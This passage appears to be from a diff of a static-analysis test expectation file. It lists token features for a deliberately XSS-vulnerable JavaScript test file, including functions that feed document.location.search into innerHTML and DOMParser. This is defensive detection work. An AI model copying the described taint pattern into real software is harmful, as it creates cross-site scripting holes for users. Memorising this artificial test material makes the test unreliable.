element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:41 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:41 | documen ... .search | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:41 | documen ... .search | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:177:18:177:41 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:177:27:177:34 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:177:27:177:34 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:177:27:177:34 | location | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:177:27:177:34 | location | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:177:27:177:34 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:177:36:177:41 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:177:36:177:41 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:177:36:177:41 | search | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:177:36:177:41 | search | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:177:36:177:41 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:14 | parser | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:14 | parser | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:14 | parser | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:14 | parser | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:14 | parser | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser ... arser() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser ... arser() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser ... arser() | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser ... arser() | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:179:9:179:32 | parser ... arser() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | exceptional return of new DOMParser() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | exceptional return of new DOMParser() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | exceptional return of new DOMParser() | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | exceptional return of new DOMParser() | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | exceptional return of new DOMParser() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | new DOMParser() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | new DOMParser() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | new DOMParser() | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | new DOMParser() | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:179:18:179:32 | new DOMParser() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:179:22:179:30 | DOMParser | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:179:22:179:30 | DOMParser | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:179:22:179:30 | DOMParser | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:179:22:179:30 | DOMParser | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:179:22:179:30 | DOMParser | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:10 | parser | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:10 | parser | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:10 | parser | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:10 | parser | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:10 | parser | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:26 | parser. ... mString | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:26 | parser. ... mString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:26 | parser. ... mString | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:26 | parser. ... mString | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:26 | parser. ... mString | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | exceptional return of parser. ... n/xml") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | exceptional return of parser. ... n/xml") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | exceptional return of parser. ... n/xml") | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | exceptional return of parser. ... n/xml") | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | exceptional return of parser. ... n/xml") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | parser. ... n/xml") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | parser. ... n/xml") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | parser. ... n/xml") | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | parser. ... n/xml") | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:180:5:180:53 | parser. ... n/xml") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:180:12:180:26 | parseFromString | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:180:12:180:26 | parseFromString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:180:12:180:26 | parseFromString | enclosingFunctionBody | target document location search parser DOMParser parser parseFromString target application/xml | +| autogenerated/Xss/DomBasedXss/tst.js:180:12:180:26 | parseFromString | enclosingFunctionName | testDOMParser | +| autogenerated/Xss/DomBasedXss/tst.js:180:12:180:26 | parseFromString | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:180:28:180:33 | target | CalleeFlexibleAccessPath | parser.parseFromString | | autogenerated/Xss/DomBasedXss/tst.js:180:28:180:33 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:180:28:180:33 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16778,42 +116077,447 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:180:36:180:52 | "application/xml" | enclosingFunctionName | testDOMParser | | autogenerated/Xss/DomBasedXss/tst.js:180:36:180:52 | "application/xml" | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:180:36:180:52 | "application/xml" | receiverName | parser | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:183:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:183:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:183:0 | this | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:183:0 | this | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:183:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | 'arguments' object of function references | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | 'arguments' object of function references | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | 'arguments' object of function references | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | 'arguments' object of function references | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | 'arguments' object of function references | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | exceptional return of function references | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | exceptional return of function references | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | exceptional return of function references | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | exceptional return of function references | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | exceptional return of function references | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | return of function references | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | return of function references | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | return of function references | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | return of function references | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:183:1:194:1 | return of function references | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:183:10:183:19 | references | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:183:10:183:19 | references | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:183:10:183:19 | references | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:15 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:15 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:15 | tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:15 | tainted | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:15 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:184:9:184:42 | tainted ... .search | contextFunctionInterfaces | 